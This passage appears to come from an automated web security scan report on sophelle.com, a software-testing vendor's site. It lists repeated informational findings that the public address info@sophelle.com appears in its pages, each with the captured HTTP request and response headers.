Date: Tue, 06 Sep 2011 15:25:59 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="shortcut icon"
...[SNIP]...
<a href="mailto:info@sophelle.com" class="footer">info@sophelle.com</a>
...[SNIP]...

22.95. http://www.sophelle.com/Contact-Us/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sophelle.com
Path:	/Contact-Us/

Issue detail

The following email address was disclosed in the response:

info@sophelle.com

Request

Response

HTTP/1.1 200 OK
Content-Length: 10039
Content-Type: text/html
Content-Location: http://www.sophelle.com/Contact-Us/index.html
Last-Modified: Tue, 26 Apr 2011 13:15:36 GMT
Accept-Ranges: bytes
ETag: "a042c37144cc1:957"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 15:26:08 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="shortcut icon"
...[SNIP]...
<a href="mailto:info@sophelle.com">info@sophelle.com</a>
...[SNIP]...
<a href="mailto:info@sophelle.com" class="footer">info@sophelle.com</a>
...[SNIP]...

22.96. http://www.sophelle.com/Contact-Us/thank-you.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sophelle.com
Path:	/Contact-Us/thank-you.html

Issue detail

The following email address was disclosed in the response:

info@sophelle.com

Request

GET /Contact-Us/thank-you.html HTTP/1.1
Host: www.sophelle.com
Proxy-Connection: keep-alive
Referer: http://www.sophelle.com/Contact-Us/
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hubspotutk=9c6ca7a5ca1546b9a6b60f57cca70bb6; hubspotvm=9c6ca7a5ca1546b9a6b60f57cca70bb6; hsfirstvisit=http%3A%2F%2Fwww.sophelle.com%2F||2011-09-04%2010%3A55%3A54; hubspotvd=9c6ca7a5ca1546b9a6b60f57cca70bb6; hubspotvw=9c6ca7a5ca1546b9a6b60f57cca70bb6; __utma=227204639.668059565.1315148193.1315148193.1315340871.2; __utmb=227204639.2.10.1315340871; __utmc=227204639; __utmz=227204639.1315148193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); hubspotdt=2011-09-06%2011%3A27%3A57

Response

HTTP/1.1 200 OK
Content-Length: 5435
Content-Type: text/html
Last-Modified: Tue, 26 Apr 2011 13:15:37 GMT
Accept-Ranges: bytes
ETag: "5214388144cc1:957"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 15:26:13 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="shortcut icon"
...[SNIP]...
<a href="mailto:info@sophelle.com" class="footer">info@sophelle.com</a>
...[SNIP]...

22.97. http://www.sophelle.com/Products/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sophelle.com
Path:	/Products/

Issue detail

The following email address was disclosed in the response:

info@sophelle.com

Request

GET /Products/ HTTP/1.1
Host: www.sophelle.com
Proxy-Connection: keep-alive
Referer: http://www.sophelle.com/Contact-Us/thank-you.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hubspotutk=9c6ca7a5ca1546b9a6b60f57cca70bb6; hubspotvm=9c6ca7a5ca1546b9a6b60f57cca70bb6; hsfirstvisit=http%3A%2F%2Fwww.sophelle.com%2F||2011-09-04%2010%3A55%3A54; hubspotvd=9c6ca7a5ca1546b9a6b60f57cca70bb6; hubspotvw=9c6ca7a5ca1546b9a6b60f57cca70bb6; __utma=227204639.668059565.1315148193.1315148193.1315340871.2; __utmb=227204639.3.10.1315340871; __utmc=227204639; __utmz=227204639.1315148193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); hubspotdt=2011-09-06%2011%3A28%3A01

Response

HTTP/1.1 200 OK
Content-Length: 8484
Content-Type: text/html
Content-Location: http://www.sophelle.com/Products/index.html
Last-Modified: Tue, 26 Apr 2011 13:19:31 GMT
Accept-Ranges: bytes
ETag: "e6173a94144cc1:957"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 15:26:16 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="shortcut icon"
...[SNIP]...
<a href="mailto:info@sophelle.com" class="footer">info@sophelle.com</a>
...[SNIP]...

22.98. http://www.sophelle.com/Products/CQ/free-trial.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sophelle.com
Path:	/Products/CQ/free-trial.html

Issue detail

The following email address was disclosed in the response:

info@sophelle.com

Request

Response

HTTP/1.1 200 OK
Content-Length: 11346
Content-Type: text/html
Last-Modified: Tue, 26 Apr 2011 13:17:45 GMT
Accept-Ranges: bytes
ETag: "88c5d554144cc1:957"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 15:26:32 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Free Trial Offer |
...[SNIP]...
<a href="mailto:info@sophelle.com" class="footer">info@sophelle.com</a>
...[SNIP]...

22.99. http://www.sophelle.com/Products/CQ/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sophelle.com
Path:	/Products/CQ/index.html

Issue detail

The following email address was disclosed in the response:

info@sophelle.com

Request

GET /Products/CQ/index.html HTTP/1.1
Host: www.sophelle.com
Proxy-Connection: keep-alive
Referer: http://www.sophelle.com/Products/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hubspotutk=9c6ca7a5ca1546b9a6b60f57cca70bb6; hubspotvm=9c6ca7a5ca1546b9a6b60f57cca70bb6; hsfirstvisit=http%3A%2F%2Fwww.sophelle.com%2F||2011-09-04%2010%3A55%3A54; hubspotvd=9c6ca7a5ca1546b9a6b60f57cca70bb6; hubspotvw=9c6ca7a5ca1546b9a6b60f57cca70bb6; __utma=227204639.668059565.1315148193.1315148193.1315340871.2; __utmb=227204639.4.10.1315340871; __utmc=227204639; __utmz=227204639.1315148193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); hubspotdt=2011-09-06%2011%3A28%3A05

Response

HTTP/1.1 200 OK
Content-Length: 9677
Content-Type: text/html
Last-Modified: Tue, 26 Apr 2011 13:19:18 GMT
Accept-Ranges: bytes
ETag: "7a3f6c8c144cc1:957"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 15:26:27 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Website Testing, Mo
...[SNIP]...
<a href="mailto:info@sophelle.com" class="footer">info@sophelle.com</a>
...[SNIP]...

22.100. http://www.sophelle.com/Products/accelerator2.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sophelle.com
Path:	/Products/accelerator2.html

Issue detail

The following email address was disclosed in the response:

info@sophelle.com

Request

GET /Products/accelerator2.html HTTP/1.1
Host: www.sophelle.com
Proxy-Connection: keep-alive
Referer: http://www.sophelle.com/Products/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hubspotutk=9c6ca7a5ca1546b9a6b60f57cca70bb6; hubspotvm=9c6ca7a5ca1546b9a6b60f57cca70bb6; hsfirstvisit=http%3A%2F%2Fwww.sophelle.com%2F||2011-09-04%2010%3A55%3A54; hubspotvd=9c6ca7a5ca1546b9a6b60f57cca70bb6; hubspotvw=9c6ca7a5ca1546b9a6b60f57cca70bb6; __utma=227204639.668059565.1315148193.1315148193.1315340871.2; __utmb=227204639.21.10.1315340871; __utmc=227204639; __utmz=227204639.1315148193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); hubspotdt=2011-09-06%2011%3A31%3A37

Response

HTTP/1.1 200 OK
Content-Length: 7632
Content-Type: text/html
Last-Modified: Tue, 26 Apr 2011 13:17:34 GMT
Accept-Ranges: bytes
ETag: "28896d4e144cc1:957"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 15:38:31 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="shortcut icon"
...[SNIP]...
<a href="mailto:info@sophelle.com" class="footer">info@sophelle.com</a>
...[SNIP]...

22.101. http://www.sophelle.com/Success-Stories/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sophelle.com
Path:	/Success-Stories/

Issue detail

The following email address was disclosed in the response:

info@sophelle.com

Request

GET /Success-Stories/ HTTP/1.1
Host: www.sophelle.com
Proxy-Connection: keep-alive
Referer: http://www.sophelle.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hubspotutk=9c6ca7a5ca1546b9a6b60f57cca70bb6; hubspotvm=9c6ca7a5ca1546b9a6b60f57cca70bb6; hsfirstvisit=http%3A%2F%2Fwww.sophelle.com%2F||2011-09-04%2010%3A55%3A54; hubspotvd=9c6ca7a5ca1546b9a6b60f57cca70bb6; hubspotvw=9c6ca7a5ca1546b9a6b60f57cca70bb6; __utma=227204639.668059565.1315148193.1315148193.1315340871.2; __utmb=227204639.19.10.1315340871; __utmc=227204639; __utmz=227204639.1315148193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); hubspotdt=2011-09-06%2011%3A28%3A17

Response

HTTP/1.1 200 OK
Content-Length: 9245
Content-Type: text/html
Content-Location: http://www.sophelle.com/Success-Stories/index.html
Last-Modified: Tue, 26 Apr 2011 13:17:57 GMT
Accept-Ranges: bytes
ETag: "ef5165c144cc1:957"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 15:29:33 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="shortcut icon"
...[SNIP]...
<a href="mailto:info@sophelle.com" class="footer">info@sophelle.com</a>
...[SNIP]...

22.102. http://www.sophelle.com/Success-Stories/Automated-Website-Testing.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sophelle.com
Path:	/Success-Stories/Automated-Website-Testing.html

Issue detail

The following email address was disclosed in the response:

info@sophelle.com

Request

Response

HTTP/1.1 200 OK
Content-Length: 9759
Content-Type: text/html
Last-Modified: Tue, 26 Apr 2011 13:17:55 GMT
Accept-Ranges: bytes
ETag: "0bf755a144cc1:957"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 15:29:49 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="shortcut icon"
...[SNIP]...
<a href="mailto:info@sophelle.com" class="footer">info@sophelle.com</a>
...[SNIP]...

22.103. http://www.sophelle.com/products/cq/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sophelle.com
Path:	/products/cq/

Issue detail

The following email address was disclosed in the response:

info@sophelle.com

Request

GET /products/cq/ HTTP/1.1
Host: www.sophelle.com
Proxy-Connection: keep-alive
Referer: http://www.sophelle.com/products/cq/frequently-asked-questions.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hubspotutk=9c6ca7a5ca1546b9a6b60f57cca70bb6; hubspotvm=9c6ca7a5ca1546b9a6b60f57cca70bb6; hsfirstvisit=http%3A%2F%2Fwww.sophelle.com%2F||2011-09-04%2010%3A55%3A54; hubspotvd=9c6ca7a5ca1546b9a6b60f57cca70bb6; hubspotvw=9c6ca7a5ca1546b9a6b60f57cca70bb6; __utma=227204639.668059565.1315148193.1315148193.1315340871.2; __utmb=227204639.17.10.1315340871; __utmc=227204639; __utmz=227204639.1315148193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); hubspotdt=2011-09-06%2011%3A28%3A17

Response

HTTP/1.1 200 OK
Content-Length: 9677
Content-Type: text/html
Content-Location: http://www.sophelle.com/products/cq/index.html
Last-Modified: Tue, 26 Apr 2011 13:19:18 GMT
Accept-Ranges: bytes
ETag: "7a3f6c8c144cc1:957"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 15:29:26 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Website Testing, Mo
...[SNIP]...
<a href="mailto:info@sophelle.com" class="footer">info@sophelle.com</a>
...[SNIP]...

22.104. http://www.sophelle.com/products/cq/expert-analysis.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sophelle.com
Path:	/products/cq/expert-analysis.html

Issue detail

The following email address was disclosed in the response:

info@sophelle.com

Request

GET /products/cq/expert-analysis.html HTTP/1.1
Host: www.sophelle.com
Proxy-Connection: keep-alive
Referer: http://www.sophelle.com/products/cq/user-interface-testing.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hubspotutk=9c6ca7a5ca1546b9a6b60f57cca70bb6; hubspotvm=9c6ca7a5ca1546b9a6b60f57cca70bb6; hsfirstvisit=http%3A%2F%2Fwww.sophelle.com%2F||2011-09-04%2010%3A55%3A54; hubspotvd=9c6ca7a5ca1546b9a6b60f57cca70bb6; hubspotvw=9c6ca7a5ca1546b9a6b60f57cca70bb6; hubspotdt=2011-09-06%2011%3A28%3A17; __utma=227204639.668059565.1315148193.1315148193.1315340871.2; __utmb=227204639.13.10.1315340871; __utmc=227204639; __utmz=227204639.1315148193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Content-Length: 9551
Content-Type: text/html
Last-Modified: Tue, 26 Apr 2011 13:17:44 GMT
Accept-Ranges: bytes
ETag: "3c85554144cc1:957"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 15:28:37 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Expert Analysis | C
...[SNIP]...
<a href="mailto:info@sophelle.com" class="footer">info@sophelle.com</a>
...[SNIP]...

22.105. http://www.sophelle.com/products/cq/frequently-asked-questions.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sophelle.com
Path:	/products/cq/frequently-asked-questions.html

Issue detail

The following email address was disclosed in the response:

info@sophelle.com

Request

GET /products/cq/frequently-asked-questions.html HTTP/1.1
Host: www.sophelle.com
Proxy-Connection: keep-alive
Referer: http://www.sophelle.com/products/cq/free-trial.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hubspotutk=9c6ca7a5ca1546b9a6b60f57cca70bb6; hubspotvm=9c6ca7a5ca1546b9a6b60f57cca70bb6; hsfirstvisit=http%3A%2F%2Fwww.sophelle.com%2F||2011-09-04%2010%3A55%3A54; hubspotvd=9c6ca7a5ca1546b9a6b60f57cca70bb6; hubspotvw=9c6ca7a5ca1546b9a6b60f57cca70bb6; __utma=227204639.668059565.1315148193.1315148193.1315340871.2; __utmb=227204639.16.10.1315340871; __utmc=227204639; __utmz=227204639.1315148193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); hubspotdt=2011-09-06%2011%3A28%3A17

Response

HTTP/1.1 200 OK
Content-Length: 18938
Content-Type: text/html
Last-Modified: Tue, 26 Apr 2011 13:17:46 GMT
Accept-Ranges: bytes
ETag: "64956955144cc1:957"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 15:29:05 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Frequently Asked Qu
...[SNIP]...
<a href="mailto:info@sophelle.com" class="footer">info@sophelle.com</a>
...[SNIP]...

22.106. http://www.sophelle.com/products/cq/functional-testing.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sophelle.com
Path:	/products/cq/functional-testing.html

Issue detail

The following email address was disclosed in the response:

info@sophelle.com

Request

GET /products/cq/functional-testing.html HTTP/1.1
Host: www.sophelle.com
Proxy-Connection: keep-alive
Referer: http://www.sophelle.com/products/cq/expert-analysis.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hubspotutk=9c6ca7a5ca1546b9a6b60f57cca70bb6; hubspotvm=9c6ca7a5ca1546b9a6b60f57cca70bb6; hsfirstvisit=http%3A%2F%2Fwww.sophelle.com%2F||2011-09-04%2010%3A55%3A54; hubspotvd=9c6ca7a5ca1546b9a6b60f57cca70bb6; hubspotvw=9c6ca7a5ca1546b9a6b60f57cca70bb6; hubspotdt=2011-09-06%2011%3A28%3A17; __utma=227204639.668059565.1315148193.1315148193.1315340871.2; __utmb=227204639.14.10.1315340871; __utmc=227204639; __utmz=227204639.1315148193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Content-Length: 9777
Content-Type: text/html
Last-Modified: Tue, 26 Apr 2011 13:17:47 GMT
Accept-Ranges: bytes
ETag: "ceddd455144cc1:957"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 15:28:40 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Functional Testing
...[SNIP]...
<a href="mailto:info@sophelle.com" class="footer">info@sophelle.com</a>
...[SNIP]...

22.107. http://www.sophelle.com/products/cq/performance-testing.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sophelle.com
Path:	/products/cq/performance-testing.html

Issue detail

The following email address was disclosed in the response:

info@sophelle.com

Request

GET /products/cq/performance-testing.html HTTP/1.1
Host: www.sophelle.com
Proxy-Connection: keep-alive
Referer: http://www.sophelle.com/products/cq/free-trial.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hubspotutk=9c6ca7a5ca1546b9a6b60f57cca70bb6; hubspotvm=9c6ca7a5ca1546b9a6b60f57cca70bb6; hsfirstvisit=http%3A%2F%2Fwww.sophelle.com%2F||2011-09-04%2010%3A55%3A54; hubspotvd=9c6ca7a5ca1546b9a6b60f57cca70bb6; hubspotvw=9c6ca7a5ca1546b9a6b60f57cca70bb6; __utma=227204639.668059565.1315148193.1315148193.1315340871.2; __utmb=227204639.9.10.1315340871; __utmc=227204639; __utmz=227204639.1315148193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); hubspotdt=2011-09-06%2011%3A28%3A17

Response

HTTP/1.1 200 OK
Content-Length: 10282
Content-Type: text/html
Last-Modified: Tue, 26 Apr 2011 13:19:21 GMT
Accept-Ranges: bytes
ETag: "8af498e144cc1:957"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 15:28:28 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Performance Testing
...[SNIP]...
<a href="mailto:info@sophelle.com" class="footer">info@sophelle.com</a>
...[SNIP]...

22.108. http://www.sophelle.com/products/cq/pricing-options.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sophelle.com
Path:	/products/cq/pricing-options.html

Issue detail

The following email address was disclosed in the response:

info@sophelle.com

Request

GET /products/cq/pricing-options.html HTTP/1.1
Host: www.sophelle.com
Proxy-Connection: keep-alive
Referer: http://www.sophelle.com/products/cq/thank-you-trial.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hubspotutk=9c6ca7a5ca1546b9a6b60f57cca70bb6; hubspotvm=9c6ca7a5ca1546b9a6b60f57cca70bb6; hsfirstvisit=http%3A%2F%2Fwww.sophelle.com%2F||2011-09-04%2010%3A55%3A54; hubspotvd=9c6ca7a5ca1546b9a6b60f57cca70bb6; hubspotvw=9c6ca7a5ca1546b9a6b60f57cca70bb6; __utma=227204639.668059565.1315148193.1315148193.1315340871.2; __utmb=227204639.7.10.1315340871; __utmc=227204639; __utmz=227204639.1315148193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); hubspotdt=2011-09-06%2011%3A28%3A17

Response

HTTP/1.1 200 OK
Content-Length: 15491
Content-Type: text/html
Last-Modified: Tue, 26 Apr 2011 13:19:22 GMT
Accept-Ranges: bytes
ETag: "282fcc8e144cc1:957"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 15:28:03 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>QA Service Prices a
...[SNIP]...
<a href="mailto:info@sophelle.com" class="footer">info@sophelle.com</a>
...[SNIP]...

22.109. http://www.sophelle.com/products/cq/thank-you-trial.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sophelle.com
Path:	/products/cq/thank-you-trial.html

Issue detail

The following email address was disclosed in the response:

info@sophelle.com

Request

GET /products/cq/thank-you-trial.html HTTP/1.1
Host: www.sophelle.com
Proxy-Connection: keep-alive
Referer: http://www.sophelle.com/Products/CQ/free-trial.html
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hubspotutk=9c6ca7a5ca1546b9a6b60f57cca70bb6; hubspotvm=9c6ca7a5ca1546b9a6b60f57cca70bb6; hsfirstvisit=http%3A%2F%2Fwww.sophelle.com%2F||2011-09-04%2010%3A55%3A54; hubspotvd=9c6ca7a5ca1546b9a6b60f57cca70bb6; hubspotvw=9c6ca7a5ca1546b9a6b60f57cca70bb6; __utma=227204639.668059565.1315148193.1315148193.1315340871.2; __utmb=227204639.6.10.1315340871; __utmc=227204639; __utmz=227204639.1315148193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); hubspotdt=2011-09-06%2011%3A28%3A17

Response

HTTP/1.1 200 OK
Content-Length: 6463
Content-Type: text/html
Last-Modified: Tue, 26 Apr 2011 13:19:29 GMT
Accept-Ranges: bytes
ETag: "9a318892144cc1:957"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 15:26:35 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Contact Us | Contin
...[SNIP]...
<a href="mailto:info@sophelle.com" class="footer">info@sophelle.com</a>
...[SNIP]...

22.110. http://www.sophelle.com/products/cq/user-interface-testing.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sophelle.com
Path:	/products/cq/user-interface-testing.html

Issue detail

The following email address was disclosed in the response:

info@sophelle.com

Request

GET /products/cq/user-interface-testing.html HTTP/1.1
Host: www.sophelle.com
Proxy-Connection: keep-alive
Referer: http://www.sophelle.com/products/cq/thank-you-trial.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hubspotutk=9c6ca7a5ca1546b9a6b60f57cca70bb6; hubspotvm=9c6ca7a5ca1546b9a6b60f57cca70bb6; hsfirstvisit=http%3A%2F%2Fwww.sophelle.com%2F||2011-09-04%2010%3A55%3A54; hubspotvd=9c6ca7a5ca1546b9a6b60f57cca70bb6; hubspotvw=9c6ca7a5ca1546b9a6b60f57cca70bb6; __utma=227204639.668059565.1315148193.1315148193.1315340871.2; __utmb=227204639.12.10.1315340871; __utmc=227204639; __utmz=227204639.1315148193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); hubspotdt=2011-09-06%2011%3A28%3A17

Response

HTTP/1.1 200 OK
Content-Length: 9510
Content-Type: text/html
Last-Modified: Tue, 26 Apr 2011 13:19:31 GMT
Accept-Ranges: bytes
ETag: "3446c593144cc1:957"
